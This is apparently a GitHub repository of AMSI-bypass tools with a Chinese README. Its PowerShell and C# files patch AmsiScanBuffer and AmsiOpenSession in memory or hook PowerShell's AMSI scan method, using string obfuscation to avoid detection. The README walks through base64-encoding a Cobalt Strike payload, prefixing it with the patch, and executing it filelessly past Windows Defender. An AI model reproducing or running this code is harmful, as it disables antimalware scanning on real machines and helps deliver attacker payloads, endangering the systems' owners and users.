├── .gitattributes ├── .gitignore ├── AmsiOpenSession.ps1 ├── DelegateAmzzBypass.ps1 ├── HookAMSI.cs ├── README.md ├── img ├── image-20220225144719026.png ├── image-20220225144807813.png ├── image-20220225144853732.png ├── image-20220225145225104.png ├── image-20220225145408952.png ├── image-20220225150152460.png ├── image-20220225171012792.png ├── image-20220225171359847.png ├── image-20220225180351342.png ├── image-20220225180856099.png ├── image-20220225181054648.png ├── image-20220225181129080.png ├── image-20220225183422626.png ├── image-20220225193018689.png ├── image-20220225212713906.png └── image-20220225220216013.png └── pay.ps1 /.gitattributes: -------------------------------------------------------------------------------- 1 | ############################################################################### 2 | # Set default behavior to automatically normalize line endings. 3 | ############################################################################### 4 | * text=auto 5 | 6 | ############################################################################### 7 | # Set default behavior for command prompt diff. 8 | # 9 | # This is need for earlier builds of msysgit that does not have it on by 10 | # default for csharp files. 11 | # Note: This is only used by command line 12 | ############################################################################### 13 | #*.cs diff=csharp 14 | 15 | ############################################################################### 16 | # Set the merge driver for project and solution files 17 | # 18 | # Merging from the command prompt will add diff markers to the files if there 19 | # are conflicts (Merging from VS is not affected by the settings below, in VS 20 | # the diff markers are never inserted). Diff markers may cause the following 21 | # file extensions to fail to load in VS. An alternative would be to treat 22 | # these files as binary and thus will always conflict and require user 23 | # intervention with every merge. To do so, just uncomment the entries below 24 | ############################################################################### 25 | #*.sln merge=binary 26 | #*.csproj merge=binary 27 | #*.vbproj merge=binary 28 | #*.vcxproj merge=binary 29 | #*.vcproj merge=binary 30 | #*.dbproj merge=binary 31 | #*.fsproj merge=binary 32 | #*.lsproj merge=binary 33 | #*.wixproj merge=binary 34 | #*.modelproj merge=binary 35 | #*.sqlproj merge=binary 36 | #*.wwaproj merge=binary 37 | 38 | ############################################################################### 39 | # behavior for image files 40 | # 41 | # image files are treated as binary by default. 42 | ############################################################################### 43 | #*.jpg binary 44 | #*.png binary 45 | #*.gif binary 46 | 47 | ############################################################################### 48 | # diff behavior for common document formats 49 | # 50 | # Convert binary document formats to text before diffing them. This feature 51 | # is only available from the command line. Turn it on by uncommenting the 52 | # entries below. 53 | ############################################################################### 54 | #*.doc diff=astextplain 55 | #*.DOC diff=astextplain 56 | #*.docx diff=astextplain 57 | #*.DOCX diff=astextplain 58 | #*.dot diff=astextplain 59 | #*.DOT diff=astextplain 60 | #*.pdf diff=astextplain 61 | #*.PDF diff=astextplain 62 | #*.rtf diff=astextplain 63 | #*.RTF diff=astextplain 64 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Ww][Ii][Nn]32/ 27 | [Aa][Rr][Mm]/ 28 | [Aa][Rr][Mm]64/ 29 | bld/ 30 | [Bb]in/ 31 | [Oo]bj/ 32 | [Oo]ut/ 33 | [Ll]og/ 34 | [Ll]ogs/ 35 | 36 | # Visual Studio 2015/2017 cache/options directory 37 | .vs/ 38 | # Uncomment if you have tasks that create the project's static files in wwwroot 39 | #wwwroot/ 40 | 41 | # Visual Studio 2017 auto generated files 42 | Generated\ Files/ 43 | 44 | # MSTest test Results 45 | [Tt]est[Rr]esult*/ 46 | [Bb]uild[Ll]og.* 47 | 48 | # NUnit 49 | *.VisualState.xml 50 | TestResult.xml 51 | nunit-*.xml 52 | 53 | # Build Results of an ATL Project 54 | [Dd]ebugPS/ 55 | [Rr]eleasePS/ 56 | dlldata.c 57 | 58 | # Benchmark Results 59 | BenchmarkDotNet.Artifacts/ 60 | 61 | # .NET Core 62 | project.lock.json 63 | project.fragment.lock.json 64 | artifacts/ 65 | 66 | # ASP.NET Scaffolding 67 | ScaffoldingReadMe.txt 68 | 69 | # StyleCop 70 | StyleCopReport.xml 71 | 72 | # Files built by Visual Studio 73 | *_i.c 74 | *_p.c 75 | *_h.h 76 | *.ilk 77 | *.meta 78 | *.obj 79 | *.iobj 80 | *.pch 81 | *.pdb 82 | *.ipdb 83 | *.pgc 84 | *.pgd 85 | *.rsp 86 | *.sbr 87 | *.tlb 88 | *.tli 89 | *.tlh 90 | *.tmp 91 | *.tmp_proj 92 | *_wpftmp.csproj 93 | *.log 94 | *.vspscc 95 | *.vssscc 96 | .builds 97 | *.pidb 98 | *.svclog 99 | *.scc 100 | 101 | # Chutzpah Test files 102 | _Chutzpah* 103 | 104 | # Visual C++ cache files 105 | ipch/ 106 | *.aps 107 | *.ncb 108 | *.opendb 109 | *.opensdf 110 | *.sdf 111 | *.cachefile 112 | *.VC.db 113 | *.VC.VC.opendb 114 | 115 | # Visual Studio profiler 116 | *.psess 117 | *.vsp 118 | *.vspx 119 | *.sap 120 | 121 | # Visual Studio Trace Files 122 | *.e2e 123 | 124 | # TFS 2012 Local Workspace 125 | $tf/ 126 | 127 | # Guidance Automation Toolkit 128 | *.gpState 129 | 130 | # ReSharper is a .NET coding add-in 131 | _ReSharper*/ 132 | *.[Rr]e[Ss]harper 133 | *.DotSettings.user 134 | 135 | # TeamCity is a build add-in 136 | _TeamCity* 137 | 138 | # DotCover is a Code Coverage Tool 139 | *.dotCover 140 | 141 | # AxoCover is a Code Coverage Tool 142 | .axoCover/* 143 | !.axoCover/settings.json 144 | 145 | # Coverlet is a free, cross platform Code Coverage Tool 146 | coverage*.json 147 | coverage*.xml 148 | coverage*.info 149 | 150 | # Visual Studio code coverage results 151 | *.coverage 152 | *.coveragexml 153 | 154 | # NCrunch 155 | _NCrunch_* 156 | .*crunch*.local.xml 157 | nCrunchTemp_* 158 | 159 | # MightyMoose 160 | *.mm.* 161 | AutoTest.Net/ 162 | 163 | # Web workbench (sass) 164 | .sass-cache/ 165 | 166 | # Installshield output folder 167 | [Ee]xpress/ 168 | 169 | # DocProject is a documentation generator add-in 170 | DocProject/buildhelp/ 171 | DocProject/Help/*.HxT 172 | DocProject/Help/*.HxC 173 | DocProject/Help/*.hhc 174 | DocProject/Help/*.hhk 175 | DocProject/Help/*.hhp 176 | DocProject/Help/Html2 177 | DocProject/Help/html 178 | 179 | # Click-Once directory 180 | publish/ 181 | 182 | # Publish Web Output 183 | *.[Pp]ublish.xml 184 | *.azurePubxml 185 | # Note: Comment the next line if you want to checkin your web deploy settings, 186 | # but database connection strings (with potential passwords) will be unencrypted 187 | *.pubxml 188 | *.publishproj 189 | 190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 191 | # checkin your Azure Web App publish settings, but sensitive information contained 192 | # in these scripts will be unencrypted 193 | PublishScripts/ 194 | 195 | # NuGet Packages 196 | *.nupkg 197 | # NuGet Symbol Packages 198 | *.snupkg 199 | # The packages folder can be ignored because of Package Restore 200 | **/[Pp]ackages/* 201 | # except build/, which is used as an MSBuild target. 202 | !**/[Pp]ackages/build/ 203 | # Uncomment if necessary however generally it will be regenerated when needed 204 | #!**/[Pp]ackages/repositories.config 205 | # NuGet v3's project.json files produces more ignorable files 206 | *.nuget.props 207 | *.nuget.targets 208 | 209 | # Microsoft Azure Build Output 210 | csx/ 211 | *.build.csdef 212 | 213 | # Microsoft Azure Emulator 214 | ecf/ 215 | rcf/ 216 | 217 | # Windows Store app package directories and files 218 | AppPackages/ 219 | BundleArtifacts/ 220 | Package.StoreAssociation.xml 221 | _pkginfo.txt 222 | *.appx 223 | *.appxbundle 224 | *.appxupload 225 | 226 | # Visual Studio cache files 227 | # files ending in .cache can be ignored 228 | *.[Cc]ache 229 | # but keep track of directories ending in .cache 230 | !?*.[Cc]ache/ 231 | 232 | # Others 233 | ClientBin/ 234 | ~$* 235 | *~ 236 | *.dbmdl 237 | *.dbproj.schemaview 238 | *.jfm 239 | *.pfx 240 | *.publishsettings 241 | orleans.codegen.cs 242 | 243 | # Including strong name files can present a security risk 244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 245 | #*.snk 246 | 247 | # Since there are multiple workflows, uncomment next line to ignore bower_components 248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 249 | #bower_components/ 250 | 251 | # RIA/Silverlight projects 252 | Generated_Code/ 253 | 254 | # Backup & report files from converting an old project file 255 | # to a newer Visual Studio version. Backup files are not needed, 256 | # because we have git ;-) 257 | _UpgradeReport_Files/ 258 | Backup*/ 259 | UpgradeLog*.XML 260 | UpgradeLog*.htm 261 | ServiceFabricBackup/ 262 | *.rptproj.bak 263 | 264 | # SQL Server files 265 | *.mdf 266 | *.ldf 267 | *.ndf 268 | 269 | # Business Intelligence projects 270 | *.rdl.data 271 | *.bim.layout 272 | *.bim_*.settings 273 | *.rptproj.rsuser 274 | *- [Bb]ackup.rdl 275 | *- [Bb]ackup ([0-9]).rdl 276 | *- [Bb]ackup ([0-9][0-9]).rdl 277 | 278 | # Microsoft Fakes 279 | FakesAssemblies/ 280 | 281 | # GhostDoc plugin setting file 282 | *.GhostDoc.xml 283 | 284 | # Node.js Tools for Visual Studio 285 | .ntvs_analysis.dat 286 | node_modules/ 287 | 288 | # Visual Studio 6 build log 289 | *.plg 290 | 291 | # Visual Studio 6 workspace options file 292 | *.opt 293 | 294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 295 | *.vbw 296 | 297 | # Visual Studio LightSwitch build output 298 | **/*.HTMLClient/GeneratedArtifacts 299 | **/*.DesktopClient/GeneratedArtifacts 300 | **/*.DesktopClient/ModelManifest.xml 301 | **/*.Server/GeneratedArtifacts 302 | **/*.Server/ModelManifest.xml 303 | _Pvt_Extensions 304 | 305 | # Paket dependency manager 306 | .paket/paket.exe 307 | paket-files/ 308 | 309 | # FAKE - F# Make 310 | .fake/ 311 | 312 | # CodeRush personal settings 313 | .cr/personal 314 | 315 | # Python Tools for Visual Studio (PTVS) 316 | __pycache__/ 317 | *.pyc 318 | 319 | # Cake - Uncomment if you are using it 320 | # tools/** 321 | # !tools/packages.config 322 | 323 | # Tabs Studio 324 | *.tss 325 | 326 | # Telerik's JustMock configuration file 327 | *.jmconfig 328 | 329 | # BizTalk build output 330 | *.btp.cs 331 | *.btm.cs 332 | *.odx.cs 333 | *.xsd.cs 334 | 335 | # OpenCover UI analysis results 336 | OpenCover/ 337 | 338 | # Azure Stream Analytics local run output 339 | ASALocalRun/ 340 | 341 | # MSBuild Binary and Structured Log 342 | *.binlog 343 | 344 | # NVidia Nsight GPU debugger configuration file 345 | *.nvuser 346 | 347 | # MFractors (Xamarin productivity tool) working folder 348 | .mfractor/ 349 | 350 | # Local History for Visual Studio 351 | .localhistory/ 352 | 353 | # BeatPulse healthcheck temp database 354 | healthchecksdb 355 | 356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 357 | MigrationBackup/ 358 | 359 | # Ionide (cross platform F# VS Code tools) working folder 360 | .ionide/ 361 | 362 | # Fody - auto-generated XML schema 363 | FodyWeavers.xsd -------------------------------------------------------------------------------- /AmsiOpenSession.ps1: -------------------------------------------------------------------------------- 1 | #Copy form https://github.com/ziyishen97/Amsi_Bypass_In_2023/blob/main/Attack_AmsiOpenSession.ps1 2 | 3 | function LookupFunc { 4 | Param ($moduleName, $functionName) 5 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 6 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 7 | Equals('System.dll') 8 | }).GetType('Microsoft.Win32.UnsafeNativeMethods') 9 | $tmp=@() 10 | $assem.GetMethods() | ForEach-Object {If($_.Name -like "Ge*P*oc*ddress") {$tmp+=$_}} 11 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, 12 | @($moduleName)), $functionName)) 13 | } 14 | 15 | 16 | function getDelegateType { 17 | Param ( 18 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] 19 | $func, [Parameter(Position = 1)] [Type] $delType = [Void] 20 | ) 21 | $type = [AppDomain]::CurrentDomain. 22 | DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 23 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run). 24 | DefineDynamicModule('InMemoryModule', $false). 25 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, 26 | AutoClass', [System.MulticastDelegate]) 27 | 28 | $type. 29 | DefineConstructor('RTSpecialName, HideBySig, Public', 30 | [System.Reflection.CallingConventions]::Standard, $func). 31 | SetImplementationFlags('Runtime, Managed') 32 | 33 | $type. 34 | DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, 35 | $func). SetImplementationFlags('Runtime, Managed') 36 | return $type.CreateType() 37 | } 38 | 39 | 40 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession 41 | $oldProtectionBuffer = 0 42 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))) 43 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer) 44 | $buf = [Byte[]] (0x48,0x31,0xc9) # Opcode for xor rcx, rcx; 45 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3) 46 | -------------------------------------------------------------------------------- /DelegateAmzzBypass.ps1: -------------------------------------------------------------------------------- 1 | function get_delegate_type { 2 | Param ( 3 | [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, 4 | [Parameter(Position = 1)] [Type] $var_return_type = [Void] 5 | ) 6 | $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 7 | $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') 8 | $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') 9 | return $var_type_builder.CreateType() 10 | } 11 | function get_proc_address { 12 | Param ($var_module, $var_procedure) 13 | $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 14 | $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) 15 | return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) 16 | } 17 | 18 | function Invoke-AMZZ { 19 | $ppruhu = get_proc_address amsi.dll "A@#m@#si@#S@#ca@#nBu@#ff@#e@#r".Replace("@#","") 20 | $virpro = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((get_proc_address kernel32.dll VirtualProtect),(get_delegate_type (@([System.IntPtr], [System.UIntPtr], [System.UInt32], [System.UInt32].MakeByRefType())) ([System.Boolean])));$p = 0 21 | $virpro.Invoke($ppruhu, [UInt32]5, 0x40, [ref]$p) 22 | 23 | $scnfh = @([Byte] 0xB8, [Byte] 0x57, [Byte] 0x00,[Byte] 0x07, [Byte] 0x80, [Byte] 0xC3) 24 | $Ui6SdR= [type]("{5}{3}{6}{9}{0}{2}{7}{4}{8}{1}" -F 'Ter','hal','o','sTem.R','i','sY','untiMe.i','psERV','ces.mArS','N'); (gI ('vARI'+'Ab'+'Le'+':ui6s'+'dR') )."v`AlUE"::("{0}{1}" -f 'Cop','y').Invoke(${s`cn`FH}, 0, ${PPr`Uhu}, 6) 25 | 26 | } 27 | 28 | 29 | Invoke-AMZZ 30 | 31 | 32 | 33 | 34 | 35 | 36 | -------------------------------------------------------------------------------- /HookAMSI.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.ComponentModel; 3 | using System.Management.Automation; 4 | using System.Reflection; 5 | using System.Runtime.CompilerServices; 6 | using System.Runtime.InteropServices; 7 | using System.Text; 8 | 9 | namespace Editor { 10 | public static class Methods { 11 | 12 | //Hook Amsi.dll 13 | public static void Patch() { 14 | MethodInfo original = typeof(PSObject).Assembly.GetType(Methods.CLASS).GetMethod(Methods.METHOD, BindingFlags.NonPublic | BindingFlags.Static); 15 | MethodInfo replacement = typeof(Methods).GetMethod("Dummy", BindingFlags.NonPublic | BindingFlags.Static); 16 | Methods.Patch(original, replacement); 17 | } 18 | 19 | [MethodImpl(MethodImplOptions.NoOptimization | MethodImplOptions.NoInlining)] 20 | private static int Dummy(string content, string metadata) { 21 | return 1; 22 | } 23 | 24 | public static void Patch(MethodInfo original, MethodInfo replacement) { 25 | //JIT compile methods 26 | RuntimeHelpers.PrepareMethod(original.MethodHandle); 27 | RuntimeHelpers.PrepareMethod(replacement.MethodHandle); 28 | 29 | //Get pointers to the functions 30 | IntPtr originalSite = original.MethodHandle.GetFunctionPointer(); 31 | IntPtr replacementSite = replacement.MethodHandle.GetFunctionPointer(); 32 | 33 | //Generate architecture specific shellcode 34 | byte[] patch = null; 35 | if (IntPtr.Size == 8) { 36 | patch = new byte[] { 0x49, 0xbb, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x41, 0xff, 0xe3 }; 37 | byte[] address = BitConverter.GetBytes(replacementSite.ToInt64()); 38 | for (int i = 0; i < address.Length; i++) { 39 | patch[i + 2] = address[i]; 40 | } 41 | } else { 42 | patch = new byte[] { 0x68, 0x0, 0x0, 0x0, 0x0, 0xc3 }; 43 | byte[] address = BitConverter.GetBytes(replacementSite.ToInt32()); 44 | for (int i = 0; i < address.Length; i++) { 45 | patch[i + 1] = address[i]; 46 | } 47 | } 48 | 49 | //Temporarily change permissions to RWE 50 | uint oldprotect; 51 | if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, 0x40, out oldprotect)) { 52 | throw new Win32Exception(); 53 | } 54 | 55 | //Apply the patch 56 | IntPtr written = IntPtr.Zero; 57 | if (!Methods.WriteProcessMemory(GetCurrentProcess(), originalSite, patch, (uint)patch.Length, out written)) { 58 | throw new Win32Exception(); 59 | } 60 | 61 | //Flush insutruction cache to make sure our new code executes 62 | if (!FlushInstructionCache(GetCurrentProcess(), originalSite, (UIntPtr)patch.Length)) { 63 | throw new Win32Exception(); 64 | } 65 | 66 | //Restore the original memory protection settings 67 | if (!VirtualProtect(originalSite, (UIntPtr)patch.Length, oldprotect, out oldprotect)) { 68 | throw new Win32Exception(); 69 | } 70 | } 71 | 72 | private static string Transform(string input) { 73 | StringBuilder builder = new StringBuilder(input.Length + 1); 74 | foreach(char c in input) { 75 | char m = (char)((int)c - 1); 76 | builder.Append(m); 77 | } 78 | return builder.ToString(); 79 | } 80 | 81 | [DllImport("kernel32.dll", SetLastError = true)] 82 | private static extern bool FlushInstructionCache(IntPtr hProcess, IntPtr lpBaseAddress, UIntPtr dwSize); 83 | 84 | [DllImport("kernel32.dll", SetLastError = true)] 85 | private static extern IntPtr GetCurrentProcess(); 86 | 87 | [DllImport("kernel32.dll", SetLastError = true)] 88 | private static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 89 | 90 | [DllImport("kernel32.dll", SetLastError = true)] 91 | private static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out IntPtr lpNumberOfBytesWritten); 92 | 93 | private static readonly string CLASS = Methods.Transform("Tztufn/Nbobhfnfou/Bvupnbujpo/BntjVujmt"); 94 | private static readonly string METHOD = Methods.Transform("TdboDpoufou"); 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 反病毒接口AMSI的浅析和绕过 2 | 3 | # AMSI简介 4 | ### 许多内网场景或处于红队评估的渗透测试者很可能遇到过 AMSI 并且熟悉它的功能。AMSI 增强了对攻击期间常用的一些现代工具、策略和程序 (TTP) 的使用保护,因为它提高了反恶意软件产品的可见性。最相关的例子是 PowerShell 无文件加载,它已被一些APT组织和恶意软件制作商广泛研究。如今越来越多的防病毒厂商正在接入AMSI防病毒接口,因此在当下,如何去规避AMSI,成为红队渗透测试者不可避免的话题。 5 | 6 | ### 如前所述,AMSI 允许服务和应用程序与已安装的反恶意软件进行通信。当系统中开始创建进程或者被申请内存,AMSI 就会处于挂钩状态,例如,Windows 脚本主机(WSH) 和PowerShell,以便对正在执行的内容进行去混淆处理和分析。此内容在执行之前被“捕获”并发送到反恶意软件解决方案。 7 | ## 打开PowerShell时amsi.dll自动加载 8 | ![image](https://user-images.githubusercontent.com/89376703/155829682-e02d955c-5446-4c6d-a853-ab37ad006ab6.png) 9 | 10 | 11 | 12 | ### 这是在 Windows 10 上实现 AMSI 的所有组件的列表: 13 | 14 | ### 用户帐户控制或 UAC(EXE、COM、MSI 或 ActiveX 安装的提升)、 PowerShell(脚本、交互式使用和动态代码评估)、Windows 脚本宿主(wscript.exe 和 cscript.exe)、JavaScript 和VBScript Office VBA 宏 15 | ### (请注意,AMSI 不仅用于扫描脚本、代码、命令或 cmdlet,还可以用于扫描任何文件、内存或数据流,例如字符串、即时消息、图片或视频。) 16 | 17 | 18 | # 0x01.字符串绕过AMSI 19 | AMSI使用“基于字符串”的检测措施来确定PowerShell代码是否为恶意代码,如: 20 | ![image](https://user-images.githubusercontent.com/89376703/155834753-e99e8456-fc84-4911-af6d-b8821946b083.png) 21 | ## 这边简单介绍几种: 22 | ## 1.用Replace函数去替换字符串内容 23 | ![image](https://user-images.githubusercontent.com/89376703/155834805-44ed3e13-1e11-4cc9-94f5-bfbbfc2feef5.png) 24 | ## 2.字符串断点+拼接 25 | ![image](https://user-images.githubusercontent.com/89376703/155834827-6f9c03a3-0000-42df-816b-eaa23c876217.png) 26 | ## 3.手工操作 27 | ### 调试器附加并定位AmsiScanBuffer函数 28 | ![image](https://user-images.githubusercontent.com/89376703/155834861-fa5d38c9-04ed-4ad0-bbfa-a68cf9b52a13.png) 29 | ### 修补该函数使其直接返回(具体细节大家可以使用ida和x64dbg跟一下)。 30 | ![image](https://user-images.githubusercontent.com/89376703/155834888-cd93fefe-7143-4a21-91fb-2d4a9b6c7cb6.png) 31 | ### 绕过AMSI 32 | ![image](https://user-images.githubusercontent.com/89376703/155834898-a4671d3e-958e-46f4-ab1a-8e8c64d5e696.png) 33 | 34 | 35 | 36 | 37 | # 0x02.通过修补 AMSI.dll 的操作码绕过ASMI 38 | 39 | ### 1.用cobaltstrike生成一个pyaload.ps1() 40 | ![image](https://user-images.githubusercontent.com/89376703/155829428-4443b718-5d03-491f-84c7-87fbb089ddd0.png) 41 | 42 | ![image](https://user-images.githubusercontent.com/89376703/155735869-45a3c954-8737-4ac4-a4ad-3b750f335b82.png) 43 | 44 | 45 | 46 | ### 使用C#加密器对整个ps1文件进行base64加密(也可用base64加密解密网站:https://www.qqxiuzi.cn/bianma/base64.htm 注意:在加密之前删除无用的空行,避免出现解密时出现错误) 47 | ![image](https://user-images.githubusercontent.com/89376703/155734073-c1d9b0d1-0da9-40b2-ad38-bdc10a5563fb.png) 48 | 49 | 50 | 51 | ### 重新创建一个文件命名为pay.ps1,将上面的base64密文复制粘贴到下面代码的$decryption字符串变量中 52 | 53 | 54 | ![image](https://user-images.githubusercontent.com/89376703/155734157-19d0ed09-04fd-4ce2-90d4-6b27b0ef65cc.png) 55 | 56 | 57 | ### 这里就是一个常用的base64的解密公式,然后用IEX去执行解密后的密文 58 | 59 | ``` 60 | 解密后的变量 = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(加密后的变量)); 61 | ``` 62 | 63 | 64 | 65 | ### 但是amsi.dll对IEX是有严格限制的,直接执行解密密文必然会被拦截,因此这里我们需要一段破坏或者劫持amsi.dll的ps代码 66 | 67 | ``` 68 | $Win32 = @" 69 | using System; 70 | using System.Runtime.InteropServices; 71 | public class Win32 { 72 | [DllImport("kernel32")] 73 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 74 | [DllImport("kernel32")] 75 | public static extern IntPtr LoadLibrary(string name); 76 | [DllImport("kernel32")] 77 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 78 | } 79 | "@ 80 | Add-Type $Win32 81 | $LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll") 82 | $Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer") 83 | $p = 0 84 | [Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p) 85 | $Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3) 86 | [System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6) 87 | ``` 88 | 89 | ### 当然如果你怕代码被云防护标记的话,可以添加一些混淆,比如说字符串的分裂和拼接,或者转换成ASCLL字符码 90 | 91 | ``` 92 | #导入API 函数 93 | $ftkgk = @" 94 | using System; 95 | using System.Runtime.InteropServices; 96 | public class ftkgk { 97 | [DllImport("kernel32")] 98 | public static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 99 | [DllImport("kernel32")] 100 | public static extern IntPtr LoadLibrary(string name); 101 | [DllImport("kernel32")] 102 | public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr gusdon, uint flNewProtect, out uint lpflOldProtect); 103 | } 104 | "@ 105 | Add-Type $ftkgk 106 | #通过 rasta-mouse 修补 amsi.dll AmsiScanBuffer 107 | $lospbeo = [ftkgk]::LoadLibrary("$(('âms'+'í.d'+'ll').NOrMALiZe([cHAr](58+12)+[cHAR](111+96-96)+[cHAr](114+68-68)+[char](109+99-99)+[chAR]([bYte]0x44)) -replace [CHAr](92+22-22)+[CHaR](112)+[cHAr]([bYTE]0x7b)+[ChaR]([BYTe]0x4d)+[chAR]([byTE]0x6e)+[ChaR](125))") 108 | $bhijoj = [ftkgk]::GetProcAddress($lospbeo, "$(('ÁmsìScànB'+'uffer').NOrmalizE([ChaR](70+60-60)+[chAR](111+76-76)+[chaR](114)+[char](109*69/69)+[CHAr]([ByTE]0x44)) -replace [ChaR](74+18)+[ChAR]([BYTE]0x70)+[cHAr](123)+[cHaR](77+31-31)+[CHar](110+64-64)+[Char](125+30-30))") 109 | $p = 0 110 | [ftkgk]::VirtualProtect($bhijoj, [uint32]5, 0x40, [ref]$p) 111 | $jniv = "0xB8" 112 | $kgmv = "0x57" 113 | $odgn = "0x00" 114 | $zalk = "0x07" 115 | $cfun = "0x80" 116 | $macm = "0xC3" 117 | $hquzq = [Byte[]] ($jniv,$kgmv,$odgn,$zalk,+$cfun,+$macm) 118 | [System.Runtime.InteropServices.Marshal]::Copy($hquzq, 0, $bhijoj, 6) 119 | ``` 120 | ### 将混淆过后的代码插入解密代码中(pay.ps1) 121 | 122 | ![image](https://user-images.githubusercontent.com/89376703/155734244-a2185115-0d62-4b8c-96f0-7e09b6caf530.png) 123 | ### 放在windows defender环境下用PowerShell无文件执行即可 124 | 125 | ![image](https://user-images.githubusercontent.com/89376703/155734381-81a55fb3-78f8-4303-b78a-0e88702ff2fb.png) 126 | 127 | ### 可以看到可以绕过微软,能执行一些基本的命令,但是dumplsass可能会下线。 128 | 129 | ## **绕过原理** 130 | 131 | ### 绕过的关键是这段代码可以阻断amsi.dll中AmsiScanBuffer()这个函数的扫描进程,目前来说,这种方法可以百分之百绕过AMSI 132 | 133 | ### 2018 年 5 月,CyberArk 发布了 POC 代码,通过修补其功能之一,即 AmsiScanBuffer() 来绕过 AMSI 134 | 135 | ## AmsiScanBuffer 的API原型 136 | 137 | ``` 138 | HRESULT AmsiScanBuffer( 139 | HAMSICONTEXT amsiContext, 140 | PVOID buffer, //缓冲区 141 | ULONG length, //长度 142 | LPCWSTR contentName, 143 | HAMSISESSION amsiSession, 144 | AMSI_RESULT *result 145 | ); 146 | ``` 147 | 148 | ### 如您所见,此函数获取要扫描的所需缓冲区和缓冲区长度。其中一个参数“长度”本质上是绕过的关键。此参数包含要扫描的字符串的长度。如果通过某种方式将参数设置为常数值 0,则 AMSI 将被有效地绕过,我们需要做的就是在保存缓冲区长度的函数中修补寄存器。通过这样做,扫描将在零长度上执行。这是通过在运行时修补 AMSI.dll 的操作码来实现的。 149 | 150 | # 绕过AMSI的代码基本流程为: 151 | ### 创建一个powershell进程 152 | ### 获取amsiscanbuffer函数地址 153 | ### 修改函数内存空间属性 154 | ### 修补函数执行体 155 | 156 | 157 | ## 使用GetProcAddress()函数获取 AmsiScanBuffer() 的句柄,找到amsi.dll中amsiscanbuffer()待修补的地址 158 | 159 | ![image](https://user-images.githubusercontent.com/89376703/155735632-e60d95eb-f017-45cf-bcc6-3ddb5218f2f6.png) 160 | 161 | 162 | ## 还有其他方法可以实现这一点。SecureYourIt 一篇博客文章(https://secureyourit.co.uk/wp/2019/05/10/dynamic-microsoft-office-365-amsi-in-memory-bypass-using-vba/) 163 | ## 